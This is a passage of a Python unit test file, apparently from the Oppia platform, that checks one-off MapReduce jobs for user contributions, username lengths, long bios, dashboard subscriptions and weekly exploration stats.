EXP_ID_2 = 'exp_id_2'
USER_A_EMAIL = '<EMAIL>'
USER_A_USERNAME = 'a'
USER_B_EMAIL = '<EMAIL>'
USER_B_USERNAME = 'b'
USER_C_EMAIL = '<EMAIL>'
USER_C_USERNAME = 'c'
USER_D_EMAIL = '<EMAIL>'
USER_D_USERNAME = 'd'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = user_jobs_one_off.UserContributionsOneOffJob.create_new()
user_jobs_one_off.UserContributionsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
def setUp(self):
super(UserContributionsOneOffJobTests, self).setUp()
# User A has no created or edited explorations.
# User B has one created exploration.
# User C has one edited exploration.
# User D has created an exploration and then edited it.
# (This is used to check that there are no duplicate
# entries in the contribution lists).
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
self.user_a_id = self.get_user_id_from_email(self.USER_A_EMAIL)
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
self.user_b_id = self.get_user_id_from_email(self.USER_B_EMAIL)
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
self.user_c_id = self.get_user_id_from_email(self.USER_C_EMAIL)
self.signup(self.USER_D_EMAIL, self.USER_D_USERNAME)
self.user_d_id = self.get_user_id_from_email(self.USER_D_EMAIL)
self.save_new_valid_exploration(
self.EXP_ID_1, self.user_b_id, end_state_name='End')
exp_services.update_exploration(
self.user_c_id, self.EXP_ID_1, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
self.save_new_valid_exploration(
self.EXP_ID_2, self.user_d_id, end_state_name='End')
exp_services.update_exploration(
self.user_d_id, self.EXP_ID_2, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
def test_null_case(self):
"""Tests the case where user has no created or edited explorations."""
self._run_one_off_job()
user_a_contributions_model = user_models.UserContributionsModel.get(
self.user_a_id, strict=False)
self.assertEqual(user_a_contributions_model.created_exploration_ids, [])
self.assertEqual(user_a_contributions_model.edited_exploration_ids, [])
def test_created_exp(self):
"""Tests the case where user has created (and therefore edited)
an exploration.
"""
self._run_one_off_job()
user_b_contributions_model = user_models.UserContributionsModel.get(
self.user_b_id)
self.assertEqual(
user_b_contributions_model.created_exploration_ids, [self.EXP_ID_1])
self.assertEqual(
user_b_contributions_model.edited_exploration_ids, [self.EXP_ID_1])
def test_edited_exp(self):
"""Tests the case where user has an edited exploration."""
self._run_one_off_job()
user_c_contributions_model = user_models.UserContributionsModel.get(
self.user_c_id)
self.assertEqual(
user_c_contributions_model.created_exploration_ids, [])
self.assertEqual(
user_c_contributions_model.edited_exploration_ids, [self.EXP_ID_1])
def test_for_duplicates(self):
"""Tests the case where user has an edited exploration, and edits
it again making sure it is not duplicated.
"""
self._run_one_off_job()
user_d_contributions_model = user_models.UserContributionsModel.get(
self.user_d_id)
self.assertEqual(
user_d_contributions_model.edited_exploration_ids,
[self.EXP_ID_2])
self.assertEqual(
user_d_contributions_model.created_exploration_ids,
[self.EXP_ID_2])
def test_no_new_user_contributions_model_get_created_with_existing_model(
self):
model1 = exp_models.ExplorationSnapshotMetadataModel(
id='exp_id-1', committer_id=self.user_a_id, commit_type='create')
model1.update_timestamps()
model1.put()
user_models.UserContributionsModel(
id=self.user_a_id,
created_exploration_ids=['exp_id']
).put()
user_contributions_model = user_models.UserContributionsModel.get(
self.user_a_id)
self.assertEqual(
user_contributions_model.created_exploration_ids,
['exp_id'])
self._run_one_off_job()
user_contributions_model = user_models.UserContributionsModel.get(
self.user_a_id)
self.assertEqual(
user_contributions_model.created_exploration_ids,
['exp_id'])
def test_user_contributions_get_created_after_running_the_job(self):
model1 = exp_models.ExplorationSnapshotMetadataModel(
id='exp_id-1', committer_id='new_user', commit_type='create')
model1.update_timestamps()
model1.put()
user_contributions_model = user_models.UserContributionsModel.get(
'new_user', strict=False)
self.assertIsNone(user_contributions_model)
self._run_one_off_job()
user_contributions_model = user_models.UserContributionsModel.get(
'new_user', strict=False)
self.assertEqual(
user_contributions_model.created_exploration_ids,
['exp_id'])
class UsernameLengthDistributionOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off username length distribution job."""
USER_A_EMAIL = '<EMAIL>'
USER_A_USERNAME = 'a'
USER_B_EMAIL = '<EMAIL>'
USER_B_USERNAME = 'ab'
USER_C_EMAIL = '<EMAIL>'
USER_C_USERNAME = 'bc'
USER_D_EMAIL = '<EMAIL>'
USER_D_USERNAME = 'bcd'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UsernameLengthDistributionOneOffJob.create_new())
user_jobs_one_off.UsernameLengthDistributionOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.UsernameLengthDistributionOneOffJob.get_output(
job_id))
output = {}
for stringified_distribution in stringified_output:
value = re.findall(r'\d+', stringified_distribution)
# The following is output['username length'] = number of users.
output[value[0]] = int(value[1])
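        # For illustration (output shape assumed): a stringified item such as
        # "[u'13', 1]" yields value == ['13', '1'], i.e. one user with a
        # 13-character username.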
return output
def test_null_case(self):
"""Tests the case when there are no signed up users but there is one
default user having the username - 'tmpsuperadm1n'.
"""
output = self._run_one_off_job()
# Number of users = 1.
# length of usernames = 13 (tmpsuperadm1n).
self.assertEqual(output['13'], 1)
def test_single_user_case(self):
"""Tests the case when there is only one signed up user and a default
user - 'tmpsuperadm1n'.
"""
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
output = self._run_one_off_job()
# Number of users = 2.
# length of usernames = 13 (tmpsuperadm1n), 1 (a).
self.assertEqual(output['13'], 1)
self.assertEqual(output['1'], 1)
def test_multiple_users_case(self):
"""Tests the case when there are multiple signed up users and a
default user - 'tmpsuperadm1n'.
"""
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
output = self._run_one_off_job()
# Number of users = 3
# length of usernames = 13 (tmpsuperadm1n), 2 (ab), 1 (a).
self.assertEqual(output['13'], 1)
self.assertEqual(output['2'], 1)
self.assertEqual(output['1'], 1)
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
self.signup(self.USER_D_EMAIL, self.USER_D_USERNAME)
output = self._run_one_off_job()
# Number of users = 5
# length of usernames = 13 (tmpsuperadm1n), 3 (bcd), 2 (ab, bc), 1 (a).
self.assertEqual(output['13'], 1)
self.assertEqual(output['3'], 1)
self.assertEqual(output['2'], 2)
self.assertEqual(output['1'], 1)
class UsernameLengthAuditOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off username length limit job."""
USER_1_EMAIL = '<EMAIL>'
USER_1_USERNAME = '123456789123456789123'
USER_2_EMAIL = '<EMAIL>'
USER_2_USERNAME = '123456789123456789124'
USER_3_EMAIL = '<EMAIL>'
USER_3_USERNAME = 'a' * 30
USER_4_EMAIL = '<EMAIL>'
# Username 4 length is 20, so it shouldn't be in the output.
USER_4_USERNAME = '12345678912345678912'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UsernameLengthAuditOneOffJob.create_new())
user_jobs_one_off.UsernameLengthAuditOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
return user_jobs_one_off.UsernameLengthAuditOneOffJob.get_output(job_id)
def test_username_length_limit(self):
self.signup(self.USER_1_EMAIL, self.USER_1_USERNAME)
self.signup(self.USER_2_EMAIL, self.USER_2_USERNAME)
self.signup(self.USER_3_EMAIL, self.USER_3_USERNAME)
expected_output = [u'[u\'Length: 21\', u"Usernames: [\'%s\', \'%s\']"]'
% (self.USER_1_USERNAME, self.USER_2_USERNAME),
u'[u\'Length: 30\', u"Usernames: [\'%s\']"]'
% self.USER_3_USERNAME]
actual_output = self._run_one_off_job()
self.assertEqual(actual_output, expected_output)
class LongUserBiosOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off long userbio length job."""
USER_A_EMAIL = '<EMAIL>'
USER_A_USERNAME = 'a'
USER_A_BIO = 'I am less than 500'
USER_B_EMAIL = '<EMAIL>'
USER_B_USERNAME = 'b'
USER_B_BIO = 'Long Bio' * 100
USER_C_EMAIL = '<EMAIL>'
USER_C_USERNAME = 'c'
USER_C_BIO = 'Same Bio' * 100
USER_D_EMAIL = '<EMAIL>'
USER_D_USERNAME = 'd'
USER_D_BIO = 'Diff Bio' * 300
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.LongUserBiosOneOffJob.create_new())
user_jobs_one_off.LongUserBiosOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.LongUserBiosOneOffJob.get_output(
job_id))
eval_output = [ast.literal_eval(stringified_item)
for stringified_item in stringified_output]
output = [[int(eval_item[0]), eval_item[1]]
for eval_item in eval_output]
return output
def test_no_userbio_returns_empty_list(self):
"""Tests the case when userbio is None."""
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
result = self._run_one_off_job()
self.assertEqual(result, [])
def test_short_userbio_returns_empty_list(self):
"""Tests the case where the userbio is less than 500 characters."""
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
user_id_a = self.get_user_id_from_email(self.USER_A_EMAIL)
user_services.update_user_bio(user_id_a, self.USER_A_BIO)
result = self._run_one_off_job()
self.assertEqual(result, [])
def test_long_userbio_length(self):
"""Tests the case where the userbio is more than 500 characters."""
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
user_id_b = self.get_user_id_from_email(self.USER_B_EMAIL)
user_services.update_user_bio(user_id_b, self.USER_B_BIO)
result = self._run_one_off_job()
expected_result = [[800, ['b']]]
self.assertEqual(result, expected_result)
def test_same_userbio_length(self):
"""Tests the case where two users have same userbio length."""
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
user_id_b = self.get_user_id_from_email(self.USER_B_EMAIL)
user_services.update_user_bio(user_id_b, self.USER_B_BIO)
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
user_id_c = self.get_user_id_from_email(self.USER_C_EMAIL)
user_services.update_user_bio(user_id_c, self.USER_C_BIO)
result = self._run_one_off_job()
result[0][1].sort()
expected_result = [[800, ['b', 'c']]]
self.assertEqual(result, expected_result)
def test_diff_userbio_length(self):
"""Tests the case where two users have different userbio lengths."""
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
user_id_c = self.get_user_id_from_email(self.USER_C_EMAIL)
user_services.update_user_bio(user_id_c, self.USER_C_BIO)
self.signup(self.USER_D_EMAIL, self.USER_D_USERNAME)
user_id_d = self.get_user_id_from_email(self.USER_D_EMAIL)
user_services.update_user_bio(user_id_d, self.USER_D_BIO)
result = sorted(self._run_one_off_job(), key=lambda x: x[0])
expected_result = [[800, ['c']], [2400, ['d']]]
self.assertEqual(result, expected_result)
def test_bio_length_for_users_with_no_bio(self):
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
user_id_a = self.get_user_id_from_email(self.USER_A_EMAIL)
model1 = user_models.UserSettingsModel(
id=user_id_a,
email=self.USER_A_EMAIL)
model1.update_timestamps()
model1.put()
result = self._run_one_off_job()
self.assertEqual(result, [])
class DashboardSubscriptionsOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off dashboard subscriptions job."""
EXP_ID_1 = 'exp_id_1'
EXP_ID_2 = 'exp_id_2'
COLLECTION_ID_1 = 'col_id_1'
COLLECTION_ID_2 = 'col_id_2'
EXP_ID_FOR_COLLECTION_1 = 'id_of_exp_in_collection_1'
USER_A_EMAIL = '<EMAIL>'
USER_A_USERNAME = 'a'
USER_B_EMAIL = '<EMAIL>'
USER_B_USERNAME = 'b'
USER_C_EMAIL = '<EMAIL>'
USER_C_USERNAME = 'c'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = user_jobs_one_off.DashboardSubscriptionsOneOffJob.create_new()
user_jobs_one_off.DashboardSubscriptionsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
def _null_fn(self, *args, **kwargs):
"""A mock for functions of the form subscribe_to_*() to represent
behavior prior to the implementation of subscriptions.
"""
pass
def setUp(self):
super(DashboardSubscriptionsOneOffJobTests, self).setUp()
self.signup(self.USER_A_EMAIL, self.USER_A_USERNAME)
self.user_a_id = self.get_user_id_from_email(self.USER_A_EMAIL)
self.signup(self.USER_B_EMAIL, self.USER_B_USERNAME)
self.user_b_id = self.get_user_id_from_email(self.USER_B_EMAIL)
self.signup(self.USER_C_EMAIL, self.USER_C_USERNAME)
self.user_c_id = self.get_user_id_from_email(self.USER_C_EMAIL)
self.user_a = user_services.get_user_actions_info(self.user_a_id)
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A creates and saves a new valid exploration.
self.save_new_valid_exploration(
self.EXP_ID_1, self.user_a_id, end_state_name='End')
def test_null_case(self):
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id, strict=False)
self.assertEqual(user_b_subscriptions_model, None)
self._run_one_off_job()
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id, strict=False)
self.assertEqual(user_b_subscriptions_model, None)
def test_feedback_thread_subscription(self):
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id, strict=False)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(user_b_subscriptions_model, None)
self.assertEqual(user_c_subscriptions_model, None)
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User B starts a feedback thread.
feedback_services.create_thread(
'exploration', self.EXP_ID_1, self.user_b_id, 'subject', 'text')
# User C adds to that thread.
thread_id = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)[0].id
feedback_services.create_message(
thread_id, self.user_c_id, None, None, 'more text')
self._run_one_off_job()
# Both users are subscribed to the feedback thread.
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id)
self.assertEqual(user_b_subscriptions_model.exploration_ids, [])
self.assertEqual(user_c_subscriptions_model.exploration_ids, [])
self.assertEqual(
user_b_subscriptions_model.general_feedback_thread_ids, [thread_id])
self.assertEqual(
user_c_subscriptions_model.general_feedback_thread_ids, [thread_id])
def test_exploration_subscription(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A adds user B as an editor to the exploration.
rights_manager.assign_role_for_exploration(
self.user_a, self.EXP_ID_1, self.user_b_id,
rights_domain.ROLE_EDITOR)
# User A adds user C as a viewer of the exploration.
rights_manager.assign_role_for_exploration(
self.user_a, self.EXP_ID_1, self.user_c_id,
rights_domain.ROLE_VIEWER)
self._run_one_off_job()
# Users A and B are subscribed to the exploration. User C is not.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(
user_a_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(
user_b_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(user_c_subscriptions_model, None)
def test_two_explorations(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A creates and saves another valid exploration.
self.save_new_valid_exploration(self.EXP_ID_2, self.user_a_id)
self._run_one_off_job()
# User A is subscribed to two explorations.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
self.assertEqual(
sorted(user_a_subscriptions_model.exploration_ids),
sorted([self.EXP_ID_1, self.EXP_ID_2]))
def test_community_owned_exploration(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A adds user B as an editor to the exploration.
rights_manager.assign_role_for_exploration(
self.user_a, self.EXP_ID_1, self.user_b_id,
rights_domain.ROLE_EDITOR)
# The exploration becomes community-owned.
rights_manager.publish_exploration(self.user_a, self.EXP_ID_1)
rights_manager.release_ownership_of_exploration(
self.user_a, self.EXP_ID_1)
# User C edits the exploration.
exp_services.update_exploration(
self.user_c_id, self.EXP_ID_1, [], 'Update exploration')
self._run_one_off_job()
# User A and user B are subscribed to the exploration; user C is not.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(
user_a_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(
user_b_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(user_c_subscriptions_model, None)
def test_deleted_exploration(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
):
# User A deletes the exploration.
exp_services.delete_exploration(self.user_a_id, self.EXP_ID_1)
self.process_and_flush_pending_mapreduce_tasks()
self._run_one_off_job()
# User A is not subscribed to the exploration.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id, strict=False)
self.assertEqual(user_a_subscriptions_model, None)
def test_collection_subscription(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
# User A creates and saves a new valid collection.
self.save_new_valid_collection(
self.COLLECTION_ID_1, self.user_a_id,
exploration_id=self.EXP_ID_FOR_COLLECTION_1)
# User A adds user B as an editor to the collection.
rights_manager.assign_role_for_collection(
self.user_a, self.COLLECTION_ID_1, self.user_b_id,
rights_domain.ROLE_EDITOR)
# User A adds user C as a viewer of the collection.
rights_manager.assign_role_for_collection(
self.user_a, self.COLLECTION_ID_1, self.user_c_id,
rights_domain.ROLE_VIEWER)
self._run_one_off_job()
# Users A and B are subscribed to the collection. User C is not.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(
user_a_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
# User A is also subscribed to the exploration within the collection
# because they created both.
self.assertEqual(
sorted(user_a_subscriptions_model.exploration_ids), [
self.EXP_ID_1, self.EXP_ID_FOR_COLLECTION_1])
self.assertEqual(
user_b_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
self.assertEqual(user_c_subscriptions_model, None)
def test_two_collections(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
# User A creates and saves a new valid collection.
self.save_new_valid_collection(
self.COLLECTION_ID_1, self.user_a_id,
exploration_id=self.EXP_ID_FOR_COLLECTION_1)
# User A creates and saves another valid collection.
self.save_new_valid_collection(
self.COLLECTION_ID_2, self.user_a_id,
exploration_id=self.EXP_ID_FOR_COLLECTION_1)
self._run_one_off_job()
# User A is subscribed to two collections.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
self.assertEqual(
sorted(user_a_subscriptions_model.collection_ids),
sorted([self.COLLECTION_ID_1, self.COLLECTION_ID_2]))
def test_deleted_collection(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_exploration', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
# User A creates and saves a new collection.
self.save_new_default_collection(
self.COLLECTION_ID_1, self.user_a_id)
# User A deletes the collection.
collection_services.delete_collection(
self.user_a_id, self.COLLECTION_ID_1)
# User A deletes the exploration from earlier.
exp_services.delete_exploration(self.user_a_id, self.EXP_ID_1)
self.process_and_flush_pending_mapreduce_tasks()
self._run_one_off_job()
# User A is not subscribed to the collection.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id, strict=False)
self.assertEqual(user_a_subscriptions_model, None)
def test_adding_exploration_to_collection(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
# User B creates and saves a new collection.
self.save_new_default_collection(
self.COLLECTION_ID_1, self.user_b_id)
# User B adds the exploration created by user A to the collection.
collection_services.update_collection(
self.user_b_id, self.COLLECTION_ID_1, [{
'cmd': collection_domain.CMD_ADD_COLLECTION_NODE,
'exploration_id': self.EXP_ID_1
}], 'Add new exploration to collection.')
# Users A and B have no subscriptions (to either explorations or
# collections).
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id, strict=False)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id, strict=False)
self.assertEqual(user_a_subscriptions_model, None)
self.assertEqual(user_b_subscriptions_model, None)
self._run_one_off_job()
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
# User B should be subscribed to the collection and user A to the
# exploration.
self.assertEqual(
user_a_subscriptions_model.exploration_ids, [self.EXP_ID_1])
self.assertEqual(
user_a_subscriptions_model.collection_ids, [])
self.assertEqual(
user_b_subscriptions_model.exploration_ids, [])
self.assertEqual(
user_b_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
def test_community_owned_collection(self):
with self.swap(
subscription_services, 'subscribe_to_thread', self._null_fn
), self.swap(
subscription_services, 'subscribe_to_collection', self._null_fn
):
rights_manager.publish_exploration(self.user_a, self.EXP_ID_1)
# User A creates and saves a new valid collection.
self.save_new_valid_collection(
self.COLLECTION_ID_1, self.user_a_id,
exploration_id=self.EXP_ID_1)
# User A adds user B as an editor to the collection.
rights_manager.assign_role_for_collection(
self.user_a, self.COLLECTION_ID_1, self.user_b_id,
rights_domain.ROLE_EDITOR)
# The collection becomes community-owned.
rights_manager.publish_collection(self.user_a, self.COLLECTION_ID_1)
rights_manager.release_ownership_of_collection(
self.user_a, self.COLLECTION_ID_1)
# User C edits the collection.
collection_services.update_collection(
self.user_c_id, self.COLLECTION_ID_1, [{
'cmd': collection_domain.CMD_EDIT_COLLECTION_PROPERTY,
'property_name': (
collection_domain.COLLECTION_PROPERTY_TITLE),
'new_value': 'New title'
}], 'Changed title.')
self._run_one_off_job()
# User A and user B are subscribed to the collection; user C is not.
user_a_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_a_id)
user_b_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_b_id)
user_c_subscriptions_model = user_models.UserSubscriptionsModel.get(
self.user_c_id, strict=False)
self.assertEqual(
user_a_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
self.assertEqual(
user_b_subscriptions_model.collection_ids, [self.COLLECTION_ID_1])
self.assertEqual(user_c_subscriptions_model, None)
class MockUserStatsAggregator(
user_jobs_continuous.UserStatsAggregator):
"""A modified UserStatsAggregator that does not start a new
batch job when the previous one has finished.
"""
@classmethod
def _get_batch_job_manager_class(cls):
return MockUserStatsMRJobManager
@classmethod
def _kickoff_batch_job_after_previous_one_ends(cls):
pass
class MockUserStatsMRJobManager(
user_jobs_continuous.UserStatsMRJobManager):
@classmethod
def _get_continuous_computation_class(cls):
return MockUserStatsAggregator
class DashboardStatsOneOffJobTests(test_utils.GenericTestBase):
"""Tests for the one-off dashboard stats job."""
CURRENT_DATE_AS_STRING = user_services.get_current_date_as_string()
DATE_AFTER_ONE_WEEK = (
(datetime.datetime.utcnow() + datetime.timedelta(7)).strftime(
feconf.DASHBOARD_STATS_DATETIME_STRING_FORMAT))
USER_SESSION_ID = 'session1'
EXP_ID_1 = 'exp_id_1'
EXP_ID_2 = 'exp_id_2'
EXP_VERSION = 1
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = user_jobs_one_off.DashboardStatsOneOffJob.create_new()
user_jobs_one_off.DashboardStatsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
def setUp(self):
super(DashboardStatsOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
def mock_get_current_date_as_string(self):
return self.CURRENT_DATE_AS_STRING
def _rate_exploration(self, user_id, exp_id, rating):
"""Assigns rating to the exploration corresponding to the given
exploration id.
Args:
user_id: str. The user id.
exp_id: str. The exploration id.
rating: int. The rating to be assigned to the given exploration.
"""
rating_services.assign_rating_to_exploration(user_id, exp_id, rating)
def _record_play(self, exp_id, state):
"""Calls StartExplorationEventHandler and records the 'play' event
corresponding to the given exploration id.
Args:
exp_id: str. The exploration id.
state: dict(str, *). The state of the exploration corresponding to
the given id.
"""
event_services.StartExplorationEventHandler.record(
exp_id, self.EXP_VERSION, state, self.USER_SESSION_ID, {},
feconf.PLAY_TYPE_NORMAL)
def test_weekly_stats_if_continuous_stats_job_has_not_been_run(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id)
exp_id = exploration.id
init_state_name = exploration.init_state_name
self._record_play(exp_id, init_state_name)
self._rate_exploration('user1', exp_id, 5)
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(weekly_stats, None)
self.assertEqual(
user_services.get_last_week_dashboard_stats(self.owner_id), None)
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
expected_results_list = [{
self.mock_get_current_date_as_string(): {
'num_ratings': 0,
'average_ratings': None,
'total_plays': 0
}
}]
self.assertEqual(weekly_stats, expected_results_list)
self.assertEqual(
user_services.get_last_week_dashboard_stats(self.owner_id),
expected_results_list[0])
def test_weekly_stats_if_no_explorations(self):
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(
weekly_stats, [{
self.mock_get_current_date_as_string(): {
'num_ratings': 0,
'average_ratings': None,
'total_plays': 0
}
}])
def test_weekly_stats_for_single_exploration(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id)
exp_id = exploration.id
init_state_name = exploration.init_state_name
self._record_play(exp_id, init_state_name)
self._rate_exploration('user1', exp_id, 5)
event_services.StatsEventsHandler.record(
self.EXP_ID_1, 1, {
'num_starts': 1,
'num_actual_starts': 0,
'num_completions': 0,
'state_stats_mapping': {}
})
self.process_and_flush_pending_tasks()
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(
weekly_stats, [{
self.mock_get_current_date_as_string(): {
'num_ratings': 1,
'average_ratings': 5.0,
'total_plays': 1
}
}])
def test_weekly_stats_for_multiple_explorations(self):
exploration_1 = self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id)
exp_id_1 = exploration_1.id
exploration_2 = self.save_new_valid_exploration(
self.EXP_ID_2, self.owner_id)
exp_id_2 = exploration_2.id
init_state_name_1 = exploration_1.init_state_name
self._record_play(exp_id_1, init_state_name_1)
self._rate_exploration('user1', exp_id_1, 5)
self._rate_exploration('user2', exp_id_2, 4)
event_services.StatsEventsHandler.record(
self.EXP_ID_1, 1, {
'num_starts': 1,
'num_actual_starts': 0,
'num_completions': 0,
'state_stats_mapping': {}
})
self.process_and_flush_pending_tasks()
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(
weekly_stats, [{
self.mock_get_current_date_as_string(): {
'num_ratings': 2,
'average_ratings': 4.5,
'total_plays': 1
}
}])
def test_stats_for_multiple_weeks(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id)
exp_id = exploration.id
init_state_name = exploration.init_state_name
self._rate_exploration('user1', exp_id, 4)
self._record_play(exp_id, init_state_name)
